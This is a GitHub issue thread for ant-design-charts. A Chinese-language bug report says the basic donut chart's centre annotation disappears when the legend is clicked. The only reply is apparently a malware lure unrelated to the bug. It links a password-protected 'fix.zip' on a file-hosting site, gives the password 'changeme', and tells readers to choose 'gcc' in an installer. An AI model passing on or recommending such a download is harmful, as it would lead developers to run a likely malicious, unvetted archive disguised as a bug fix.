### ISSUE TITLE
🐛[BUG]  基础环图，点击图例，标注消失

### ISSUE THREAD

**Issue by DZ8545** [ant-design/ant-design-charts#2665]
### 🐛 bug 描述 [详细地描述 bug，让大家都能理解]
点击图例，基础环图中间标注部分消失
### 📷 复现步骤 [清晰描述复现步骤，让别人也能看到问题]
https://ant-design-charts.antgroup.com/zh/examples/statistics/pie#basic-donut  
点击图例，基础环图中间标注部分消失
### 🏞 期望结果 [描述你原本期望看到的结果]
点击图例，基础环图中间标注部分不消失
### © 版本信息

- ant-design-charts 版本: [e.g. 2.0.0]
- 浏览器环境
- 开发环境 [e.g. mac OS]

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
